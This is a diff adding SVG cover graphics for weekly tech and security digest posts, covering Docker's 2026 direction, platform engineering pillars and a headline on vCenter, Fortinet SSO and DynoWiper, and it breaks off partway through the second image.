+    <text x="131" y="30" text-anchor="middle" font-family="Inter, monospace" font-size="18" font-weight="900" fill="#3A86FF">2</text>
+    <text x="131" y="56" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" font-weight="700" fill="#8FB8FF">RESILIENCE</text>
+    <text x="131" y="68" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" fill="#BFC9D9">Chaos Eng</text>
+    <text x="131" y="80" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" fill="#BFC9D9">SRE</text>
+    <!-- Pillar 3 -->
+    <rect x="180" y="0" width="82" height="100" rx="6" fill="#0E2038" stroke="#3A86FF" stroke-width="1.2"/>
+    <rect x="180" y="0" width="82" height="6" rx="3" fill="#3A86FF" opacity="0.8"/>
+    <text x="221" y="30" text-anchor="middle" font-family="Inter, monospace" font-size="18" font-weight="900" fill="#3A86FF">3</text>
+    <text x="221" y="56" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" font-weight="700" fill="#8FB8FF">AUTOMATION</text>
+    <text x="221" y="68" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" fill="#BFC9D9">GitOps</text>
+    <text x="221" y="80" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" fill="#BFC9D9">CI/CD</text>
+    <!-- Pillar 4 -->
+    <rect x="270" y="0" width="82" height="100" rx="6" fill="#0E2038" stroke="#3A86FF" stroke-width="1.2"/>
+    <rect x="270" y="0" width="82" height="6" rx="3" fill="#3A86FF" opacity="0.8"/>
+    <text x="311" y="30" text-anchor="middle" font-family="Inter, monospace" font-size="18" font-weight="900" fill="#3A86FF">4</text>
+    <text x="311" y="56" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" font-weight="700" fill="#8FB8FF">OBSERV.</text>
+    <text x="311" y="68" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" fill="#BFC9D9">eBPF</text>
+    <text x="311" y="80" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="8" fill="#BFC9D9">Telemetry</text>
+  </g>
+
+  <!-- agent pulse -->
+  <g transform="translate(396,162)">
+    <circle r="20" fill="#0A1B2E" stroke="#3A86FF" stroke-width="2" filter="url(#softShadow)"/>
+    <text y="5" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="800" fill="#8FB8FF">CNCF</text>
+    <g stroke="#3A86FF" stroke-width="1" stroke-dasharray="3 3" fill="none" opacity="0.65">
+      <line x1="0" y1="0" x2="-44" y2="-28"/>
+      <line x1="0" y1="0" x2="-44" y2="28"/>
+      <line x1="0" y1="0" x2="44" y2="-28"/>
+      <line x1="0" y1="0" x2="44" y2="28"/>
+    </g>
+    <g fill="#8FB8FF">
+      <circle cx="-44" cy="-28" r="5"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.2s" repeatCount="indefinite"/></circle>
+      <circle cx="-44" cy="28" r="5"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.9s" begin="0.4s" repeatCount="indefinite"/></circle>
+      <circle cx="44" cy="-28" r="5"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.4s" begin="0.8s" repeatCount="indefinite"/></circle>
+      <circle cx="44" cy="28" r="5"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.0s" begin="1.2s" repeatCount="indefinite"/></circle>
+    </g>
+  </g>
+
+  <!-- KPI card -->
+  <g transform="translate(430,124)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.8"/>
+    <text x="60" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#8FB8FF">PILLARS</text>
+    <text x="60" y="64" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="40" font-weight="900" fill="#F5F7FA">4</text>
+    <text x="60" y="84" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#8FB8FF">platform control</text>
+  </g>
+</g>
+
+<!-- CARD 04: Docker Identity Crisis (bottom-right) — TREND / Purple -->
+<g transform="translate(612,348)">
+  <rect x="0" y="0" width="556" height="242" rx="14" fill="url(#cardD)" stroke="#8B5CF6" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="242" fill="#8B5CF6"/>
+  <rect x="0" y="0" width="556" height="4" fill="#8B5CF6" opacity="0.7"/>
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#8B5CF6" opacity="0.2"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#C4B5FD">04</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#C4B5FD" letter-spacing="2.4">TREND  /  CONTAINER</text>
+    <text x="74" y="58" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Docker Identity Crisis 2026</text>
+  </g>
+  <text x="20" y="102" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="500" fill="#DDD6FE">Container pioneer vs. Kubernetes-native ecosystem</text>
+
+  <!-- Docker vs ecosystem diagram -->
+  <g transform="translate(26,118)" filter="url(#softShadow)">
+    <!-- Docker whale simplified -->
+    <rect x="0" y="16" width="100" height="64" rx="8" fill="#1E1A4E" stroke="#8B5CF6" stroke-width="1.6"/>
+    <text x="50" y="38" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="800" fill="#C4B5FD">DOCKER</text>
+    <!-- container stack bars -->
+    <rect x="10" y="44" width="26" height="8" rx="2" fill="#8B5CF6" opacity="0.9"/>
+    <rect x="10" y="54" width="26" height="8" rx="2" fill="#8B5CF6" opacity="0.7"/>
+    <rect x="10" y="64" width="26" height="8" rx="2" fill="#8B5CF6" opacity="0.5"/>
+    <rect x="44" y="44" width="26" height="8" rx="2" fill="#6D28D9" opacity="0.9"/>
+    <rect x="44" y="54" width="26" height="8" rx="2" fill="#6D28D9" opacity="0.7"/>
+    <rect x="44" y="64" width="26" height="8" rx="2" fill="#6D28D9" opacity="0.5"/>
+    <!-- vs arrow -->
+    <path d="M110 48 L138 48" stroke="#8B5CF6" stroke-width="2" fill="none" stroke-dasharray="4 3">
+      <animate attributeName="stroke-dashoffset" values="0;-14" dur="1.6s" repeatCount="indefinite"/>
+    </path>
+    <text x="120" y="44" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#C4B5FD">vs</text>
+    <!-- k8s box -->
+    <rect x="142" y="16" width="96" height="64" rx="8" fill="#14143A" stroke="#C4B5FD" stroke-width="1.2"/>
+    <text x="190" y="38" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#C4B5FD">k8s native</text>
+    <text x="190" y="52" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#DDD6FE">containerd</text>
+    <text x="190" y="64" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#DDD6FE">Podman</text>
+    <text x="190" y="76" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#DDD6FE">nerdctl</text>
+  </g>
+
+  <!-- timeline fork -->
+  <g transform="translate(290,144)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="110" height="72" rx="8" fill="#14143A" stroke="#8B5CF6" stroke-width="1.2"/>
+    <text x="55" y="18" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="9" font-weight="700" letter-spacing="1.5" fill="#C4B5FD">ECOSYSTEM</text>
+    <text x="55" y="34" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#DDD6FE">Compose v2</text>
+    <text x="55" y="48" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#DDD6FE">Docker Scout</text>
+    <text x="55" y="62" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="700" fill="#C4B5FD">rebrand pivot</text>
+  </g>
+
+  <!-- KPI card -->
+  <g transform="translate(420,124)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#14143A" stroke="#8B5CF6" stroke-width="1.8"/>
+    <text x="60" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="9" font-weight="700" letter-spacing="2" fill="#C4B5FD">LAUNCHED</text>
+    <text x="60" y="56" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="30" font-weight="900" fill="#F5F7FA">2013</text>
+    <text x="60" y="74" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="9" font-weight="600" fill="#C4B5FD">still evolving</text>
+    <text x="60" y="88" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="9" fill="#DDD6FE">2026 pivot</text>
+  </g>
+
+  <!-- pulse dots -->
+  <g fill="#C4B5FD">
+    <circle cx="500" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="2.0s" repeatCount="indefinite"/></circle>
+    <circle cx="516" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.6s" begin="0.4s" repeatCount="indefinite"/></circle>
+  </g>
+</g>
+
+<!-- Ambient severity pulse bars -->
+<g opacity="0.85">
+  <g fill="#F87171">
+    <rect x="210" y="66" width="4" height="4" rx="1"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.4s" repeatCount="indefinite"/></rect>
+    <rect x="222" y="66" width="4" height="4" rx="1"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.6s" begin="0.3s" repeatCount="indefinite"/></rect>
+  </g>
+  <g fill="#FFB703">
+    <rect x="790" y="66" width="4" height="4" rx="1"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.5s" repeatCount="indefinite"/></rect>
+    <rect x="802" y="66" width="4" height="4" rx="1"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.7s" begin="0.3s" repeatCount="indefinite"/></rect>
+  </g>
+</g>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/01/24/Tech_Security_Weekly_Digest_BitLocker_FBI_Cloudflare_Route_Leak_Agentic_Enterprise_Docker/ : 49x49 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.714286)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h3v1h-3zM12 0h3v1h-3zM17 0h1v1h-1zM19 0h1v1h-1zM21 0h1v1h-1zM24 0h1v1h-1zM28 0h2v1h-2zM31 0h1v1h-1zM33 0h1v1h-1zM35 0h1v1h-1zM37 0h1v1h-1zM40 0h1v1h-1zM42 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM9 1h1v1h-1zM11 1h4v1h-4zM17 1h1v1h-1zM19 1h10v1h-10zM30 1h1v1h-1zM34 1h2v1h-2zM38 1h3v1h-3zM42 1h1v1h-1zM48 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM9 2h3v1h-3zM15 2h1v1h-1zM18 2h3v1h-3zM22 2h2v1h-2zM25 2h2v1h-2zM28 2h1v1h-1zM30 2h2v1h-2zM34 2h3v1h-3zM39 2h2v1h-2zM42 2h1v1h-1zM44 2h3v1h-3zM48 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h1v1h-1zM13 3h1v1h-1zM16 3h3v1h-3zM22 3h1v1h-1zM24 3h3v1h-3zM28 3h1v1h-1zM30 3h2v1h-2zM37 3h1v1h-1zM39 3h1v1h-1zM42 3h1v1h-1zM44 3h3v1h-3zM48 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h1v1h-1zM16 4h3v1h-3zM22 4h6v1h-6zM29 4h2v1h-2zM32 4h2v1h-2zM35 4h2v1h-2zM42 4h1v1h-1zM44 4h3v1h-3zM48 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h3v1h-3zM12 5h3v1h-3zM19 5h1v1h-1zM21 5h2v1h-2zM26 5h2v1h-2zM32 5h1v1h-1zM34 5h5v1h-5zM42 5h1v1h-1zM48 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h1v1h-1zM40 6h1v1h-1zM42 6h7v1h-7zM8 7h1v1h-1zM10 7h2v1h-2zM15 7h3v1h-3zM19 7h2v1h-2zM22 7h1v1h-1zM26 7h1v1h-1zM28 7h1v1h-1zM31 7h1v1h-1zM34 7h1v1h-1zM36 7h1v1h-1zM40 7h1v1h-1zM0 8h1v1h-1zM4 8h1v1h-1zM6 8h4v1h-4zM11 8h5v1h-5zM17 8h2v1h-2zM21 8h7v1h-7zM29 8h1v1h-1zM32 8h2v1h-2zM35 8h2v1h-2zM40 8h6v1h-6zM48 8h1v1h-1zM1 9h1v1h-1zM13 9h1v1h-1zM15 9h3v1h-3zM20 9h1v1h-1zM22 9h1v1h-1zM26 9h2v1h-2zM29 9h2v1h-2zM33 9h1v1h-1zM35 9h1v1h-1zM38 9h2v1h-2zM41 9h7v1h-7zM0 10h1v1h-1zM2 10h5v1h-5zM8 10h2v1h-2zM11 10h2v1h-2zM15 10h1v1h-1zM17 10h2v1h-2zM20 10h1v1h-1zM24 10h4v1h-4zM29 10h4v1h-4zM35 10h1v1h-1zM38 10h2v1h-2zM41 10h3v1h-3zM45 10h3v1h-3zM2 11h2v1h-2zM7 11h1v1h-1zM11 11h1v1h-1zM17 11h1v1h-1zM19 11h2v1h-2zM22 11h6v1h-6zM30 11h1v1h-1zM32 11h1v1h-1zM34 11h1v1h-1zM36 11h1v1h-1zM38 11h7v1h-7zM46 11h1v1h-1zM48 11h1v1h-1zM1 12h2v1h-2zM6 12h5v1h-5zM14 12h3v1h-3zM20 12h2v1h-2zM23 12h2v1h-2zM29 12h1v1h-1zM32 12h1v1h-1zM35 12h2v1h-2zM38 12h1v1h-1zM44 12h1v1h-1zM46 12h2v1h-2zM5 13h1v1h-1zM8 13h1v1h-1zM10 13h3v1h-3zM14 13h2v1h-2zM17 13h1v1h-1zM19 13h2v1h-2zM23 13h2v1h-2zM26 13h2v1h-2zM29 13h2v1h-2zM33 13h1v1h-1zM36 13h1v1h-1zM38 13h2v1h-2zM42 13h1v1h-1zM44 13h1v1h-1zM47 13h1v1h-1zM0 14h1v1h-1zM2 14h1v1h-1zM6 14h2v1h-2zM9 14h2v1h-2zM13 14h1v1h-1zM15 14h1v1h-1zM17 14h1v1h-1zM19 14h1v1h-1zM22 14h2v1h-2zM31 14h1v1h-1zM33 14h1v1h-1zM37 14h1v1h-1zM39 14h1v1h-1zM41 14h3v1h-3zM1 15h5v1h-5zM9 15h2v1h-2zM13 15h1v1h-1zM15 15h1v1h-1zM17 15h1v1h-1zM21 15h6v1h-6zM28 15h2v1h-2zM33 15h4v1h-4zM38 15h3v1h-3zM43 15h2v1h-2zM46 15h2v1h-2zM1 16h1v1h-1zM4 16h4v1h-4zM11 16h2v1h-2zM19 16h1v1h-1zM21 16h1v1h-1zM23 16h2v1h-2zM29 16h8v1h-8zM38 16h1v1h-1zM40 16h1v1h-1zM42 16h4v1h-4zM0 17h2v1h-2zM3 17h3v1h-3zM8 17h1v1h-1zM10 17h5v1h-5zM16 17h3v1h-3zM20 17h1v1h-1zM23 17h1v1h-1zM26 17h2v1h-2zM30 17h1v1h-1zM33 17h1v1h-1zM36 17h1v1h-1zM38 17h2v1h-2zM42 17h2v1h-2zM45 17h1v1h-1zM0 18h1v1h-1zM3 18h1v1h-1zM5 18h4v1h-4zM10 18h1v1h-1zM12 18h1v1h-1zM15 18h5v1h-5zM27 18h2v1h-2zM31 18h3v1h-3zM37 18h2v1h-2zM40 18h3v1h-3zM45 18h2v1h-2zM0 19h1v1h-1zM2 19h1v1h-1zM5 19h1v1h-1zM11 19h1v1h-1zM14 19h6v1h-6zM21 19h2v1h-2zM24 19h1v1h-1zM27 19h1v1h-1zM30 19h1v1h-1zM32 19h1v1h-1zM36 19h1v1h-1zM40 19h2v1h-2zM43 19h2v1h-2zM46 19h1v1h-1zM0 20h1v1h-1zM2 20h2v1h-2zM5 20h4v1h-4zM12 20h1v1h-1zM14 20h1v1h-1zM16 20h1v1h-1zM19 20h1v1h-1zM22 20h3v1h-3zM26 20h2v1h-2zM32 20h5v1h-5zM40 20h1v1h-1zM43 20h4v1h-4zM0 21h1v1h-1zM2 21h2v1h-2zM5 21h1v1h-1zM7 21h2v1h-2zM10 21h2v1h-2zM18 21h1v1h-1zM20 21h1v1h-1zM23 21h1v1h-1zM25 21h2v1h-2zM30 21h2v1h-2zM33 21h1v1h-1zM35 21h1v1h-1zM38 21h2v1h-2zM41 21h2v1h-2zM48 21h1v1h-1zM1 22h2v1h-2zM4 22h5v1h-5zM12 22h2v1h-2zM15 22h1v1h-1zM18 22h1v1h-1zM20 22h1v1h-1zM22 22h5v1h-5zM28 22h3v1h-3zM33 22h1v1h-1zM36 22h1v1h-1zM38 22h9v1h-9zM1 23h4v1h-4zM8 23h1v1h-1zM15 23h1v1h-1zM17 23h2v1h-2zM22 23h1v1h-1zM26 23h1v1h-1zM31 23h1v1h-1zM33 23h4v1h-4zM38 23h3v1h-3zM44 23h4v1h-4zM1 24h4v1h-4zM6 24h1v1h-1zM8 24h3v1h-3zM12 24h2v1h-2zM15 24h3v1h-3zM22 24h1v1h-1zM24 24h1v1h-1zM26 24h2v1h-2zM29 24h2v1h-2zM32 24h1v1h-1zM34 24h7v1h-7zM42 24h1v1h-1zM44 24h5v1h-5zM0 25h1v1h-1zM3 25h2v1h-2zM8 25h1v1h-1zM14 25h1v1h-1zM16 25h2v1h-2zM19 25h4v1h-4zM26 25h1v1h-1zM29 25h2v1h-2zM32 25h2v1h-2zM35 25h2v1h-2zM38 25h1v1h-1zM40 25h1v1h-1zM44 25h3v1h-3zM1 26h1v1h-1zM3 26h6v1h-6zM10 26h2v1h-2zM13 26h1v1h-1zM16 26h1v1h-1zM22 26h5v1h-5zM29 26h2v1h-2zM32 26h2v1h-2zM37 26h1v1h-1zM40 26h5v1h-5zM47 26h1v1h-1zM0 27h1v1h-1zM4 27h1v1h-1zM8 27h1v1h-1zM10 27h1v1h-1zM14 27h1v1h-1zM16 27h1v1h-1zM18 27h1v1h-1zM23 27h1v1h-1zM25 27h1v1h-1zM27 27h1v1h-1zM29 27h1v1h-1zM32 27h1v1h-1zM34 27h1v1h-1zM36 27h3v1h-3zM46 27h3v1h-3zM0 28h3v1h-3zM5 28h3v1h-3zM9 28h1v1h-1zM12 28h1v1h-1zM14 28h2v1h-2zM18 28h10v1h-10zM32 28h1v1h-1zM34 28h3v1h-3zM41 28h2v1h-2zM46 28h3v1h-3zM1 29h1v1h-1zM7 29h2v1h-2zM10 29h1v1h-1zM14 29h2v1h-2zM17 29h2v1h-2zM22 29h1v1h-1zM24 29h7v1h-7zM32 29h2v1h-2zM38 29h1v1h-1zM41 29h2v1h-2zM44 29h3v1h-3zM3 30h1v1h-1zM6 30h3v1h-3zM11 30h4v1h-4zM16 30h1v1h-1zM20 30h2v1h-2zM25 30h1v1h-1zM29 30h2v1h-2zM33 30h1v1h-1zM35 30h1v1h-1zM39 30h2v1h-2zM44 30h1v1h-1zM1 31h2v1h-2zM4 31h2v1h-2zM8 31h2v1h-2zM11 31h3v1h-3zM15 31h1v1h-1zM19 31h2v1h-2zM22 31h2v1h-2zM26 31h3v1h-3zM30 31h1v1h-1zM32 31h2v1h-2zM35 31h1v1h-1zM39 31h1v1h-1zM42 31h3v1h-3zM46 31h1v1h-1zM48 31h1v1h-1zM0 32h1v1h-1zM2 32h1v1h-1zM4 32h1v1h-1zM6 32h1v1h-1zM9 32h2v1h-2zM13 32h1v1h-1zM16 32h1v1h-1zM19 32h1v1h-1zM21 32h2v1h-2zM26 32h3v1h-3zM31 32h6v1h-6zM41 32h1v1h-1zM43 32h1v1h-1zM47 32h2v1h-2zM0 33h2v1h-2zM3 33h1v1h-1zM5 33h1v1h-1zM7 33h1v1h-1zM10 33h2v1h-2zM13 33h1v1h-1zM17 33h1v1h-1zM20 33h2v1h-2zM23 33h4v1h-4zM28 33h2v1h-2zM31 33h1v1h-1zM33 33h1v1h-1zM35 33h1v1h-1zM38 33h4v1h-4zM44 33h2v1h-2zM0 34h4v1h-4zM6 34h2v1h-2zM10 34h3v1h-3zM15 34h2v1h-2zM18 34h4v1h-4zM25 34h1v1h-1zM29 34h1v1h-1zM33 34h1v1h-1zM36 34h1v1h-1zM38 34h4v1h-4zM43 34h4v1h-4zM0 35h1v1h-1zM3 35h1v1h-1zM5 35h1v1h-1zM10 35h1v1h-1zM12 35h2v1h-2zM15 35h1v1h-1zM18 35h2v1h-2zM22 35h1v1h-1zM26 35h1v1h-1zM30 35h3v1h-3zM34 35h3v1h-3zM38 35h1v1h-1zM41 35h2v1h-2zM44 35h1v1h-1zM46 35h2v1h-2zM0 36h1v1h-1zM3 36h1v1h-1zM6 36h7v1h-7zM15 36h2v1h-2zM19 36h4v1h-4zM27 36h1v1h-1zM32 36h1v1h-1zM35 36h4v1h-4zM41 36h1v1h-1zM45 36h4v1h-4zM0 37h3v1h-3zM7 37h6v1h-6zM14 37h1v1h-1zM20 37h1v1h-1zM22 37h6v1h-6zM29 37h2v1h-2zM32 37h2v1h-2zM36 37h3v1h-3zM40 37h2v1h-2zM43 37h2v1h-2zM47 37h1v1h-1zM1 38h1v1h-1zM5 38h4v1h-4zM12 38h1v1h-1zM14 38h4v1h-4zM19 38h2v1h-2zM22 38h1v1h-1zM25 38h1v1h-1zM28 38h3v1h-3zM36 38h1v1h-1zM38 38h2v1h-2zM43 38h2v1h-2zM46 38h1v1h-1zM1 39h3v1h-3zM9 39h1v1h-1zM11 39h4v1h-4zM18 39h4v1h-4zM23 39h2v1h-2zM26 39h2v1h-2zM31 39h3v1h-3zM35 39h4v1h-4zM43 39h4v1h-4zM0 40h3v1h-3zM6 40h2v1h-2zM16 40h2v1h-2zM21 40h7v1h-7zM29 40h2v1h-2zM32 40h2v1h-2zM35 40h2v1h-2zM40 40h5v1h-5zM46 40h1v1h-1zM8 41h2v1h-2zM12 41h4v1h-4zM17 41h4v1h-4zM22 41h1v1h-1zM26 41h8v1h-8zM35 41h1v1h-1zM38 41h3v1h-3zM44 41h1v1h-1zM47 41h1v1h-1zM0 42h7v1h-7zM8 42h1v1h-1zM10 42h4v1h-4zM17 42h2v1h-2zM20 42h3v1h-3zM24 42h1v1h-1zM26 42h2v1h-2zM29 42h3v1h-3zM35 42h1v1h-1zM37 42h1v1h-1zM40 42h1v1h-1zM42 42h1v1h-1zM44 42h1v1h-1zM47 42h1v1h-1zM0 43h1v1h-1zM6 43h1v1h-1zM12 43h2v1h-2zM16 43h3v1h-3zM21 43h2v1h-2zM26 43h2v1h-2zM30 43h1v1h-1zM32 43h1v1h-1zM36 43h1v1h-1zM40 43h1v1h-1zM44 43h1v1h-1zM46 43h3v1h-3zM0 44h1v1h-1zM2 44h3v1h-3zM6 44h1v1h-1zM8 44h1v1h-1zM10 44h1v1h-1zM12 44h2v1h-2zM16 44h1v1h-1zM20 44h8v1h-8zM29 44h1v1h-1zM32 44h1v1h-1zM36 44h1v1h-1zM39 44h6v1h-6zM46 44h1v1h-1zM48 44h1v1h-1zM0 45h1v1h-1zM2 45h3v1h-3zM6 45h1v1h-1zM10 45h1v1h-1zM13 45h2v1h-2zM16 45h1v1h-1zM19 45h3v1h-3zM23 45h1v1h-1zM27 45h5v1h-5zM33 45h1v1h-1zM38 45h4v1h-4zM45 45h1v1h-1zM48 45h1v1h-1zM0 46h1v1h-1zM2 46h3v1h-3zM6 46h1v1h-1zM11 46h1v1h-1zM13 46h1v1h-1zM17 46h1v1h-1zM19 46h1v1h-1zM21 46h2v1h-2zM26 46h3v1h-3zM30 46h1v1h-1zM33 46h1v1h-1zM36 46h1v1h-1zM38 46h1v1h-1zM40 46h1v1h-1zM42 46h2v1h-2zM46 46h3v1h-3zM0 47h1v1h-1zM6 47h1v1h-1zM12 47h1v1h-1zM14 47h2v1h-2zM17 47h1v1h-1zM22 47h1v1h-1zM24 47h3v1h-3zM28 47h2v1h-2zM31 47h2v1h-2zM34 47h1v1h-1zM37 47h1v1h-1zM39 47h1v1h-1zM46 47h2v1h-2zM0 48h7v1h-7zM8 48h2v1h-2zM12 48h1v1h-1zM15 48h2v1h-2zM19 48h1v1h-1zM21 48h1v1h-1zM23 48h1v1h-1zM25 48h2v1h-2zM29 48h2v1h-2zM32 48h2v1h-2zM35 48h2v1h-2zM38 48h1v1h-1zM42 48h3v1h-3zM46 48h3v1h-3z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
+</svg>

--- a/assets/images/2026-01-25-Tech_Security_Weekly_Digest_VMware_vCenter_Fortinet_SSO_Sandworm_DynoWiper_AI_Agents.svg
+++ b/assets/images/2026-01-25-Tech_Security_Weekly_Digest_VMware_vCenter_Fortinet_SSO_Sandworm_DynoWiper_AI_Agents.svg
@@ -1,0 +1,349 @@
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Weekly metro map: VMware vCenter KEV, Fortinet SSO Bypass, Sandworm DynoWiper">
+<title>VMware vCenter CVE-2024-37079 KEV, Fortinet FortiGate SSO Bypass Zero-Day, Sandworm DynoWiper Poland Grid Attack</title>
+<!-- profile: high-quality-cover (L21 Metro Map, research-based, batch1-locked) -->
+<defs>
+  <linearGradient id="bgGrad" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1020"/>
+    <stop offset="50%" stop-color="#0C1630"/>
+    <stop offset="100%" stop-color="#0F1A3A"/>
+  </linearGradient>
+  <radialGradient id="pulseRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FF4D5E" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#E63946" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="pulseAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFC43D" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#FFA107" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#FFA107" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="pulseCyan" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#5FD3F3" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#2AA8CE" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#2AA8CE" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="30" height="30" patternUnits="userSpaceOnUse">
+    <circle cx="15" cy="15" r="0.7" fill="#2E3A66" opacity="0.55"/>
+  </pattern>
+  <filter id="stationShadow" x="-20%" y="-20%" width="140%" height="140%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.2"/>
+    <feOffset dx="0" dy="2"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.6"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="120%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1"/>
+    <feOffset dx="1" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.85"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="glowRed" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+  <filter id="glowAmber" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+  <filter id="glowCyan" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+  <clipPath id="canvasClip">
+    <rect x="0" y="0" width="1200" height="630"/>
+  </clipPath>
+<filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%"><feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/><feOffset dx="1" dy="3"/><feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer><feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge></filter></defs>
+
+<!-- Background -->
+<rect width="1200" height="630" fill="url(#bgGrad)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
+
+<!-- Subtle map guides -->
+<g opacity="0.12" stroke="#4A6AA0" stroke-width="0.6" fill="none">
+  <line x1="0" y1="150" x2="1200" y2="150">
+  </line>
+  <line x1="0" y1="310" x2="1200" y2="310">
+  </line>
+  <line x1="0" y1="470" x2="1200" y2="470">
+  </line>
+  <line x1="200" y1="0" x2="200" y2="630"/>
+  <line x1="500" y1="0" x2="500" y2="630"/>
+  <line x1="800" y1="0" x2="800" y2="630"/>
+  <line x1="1050" y1="0" x2="1050" y2="630"/>
+</g>
+
+<!-- Header title area -->
+<g filter="url(#textShadow)">
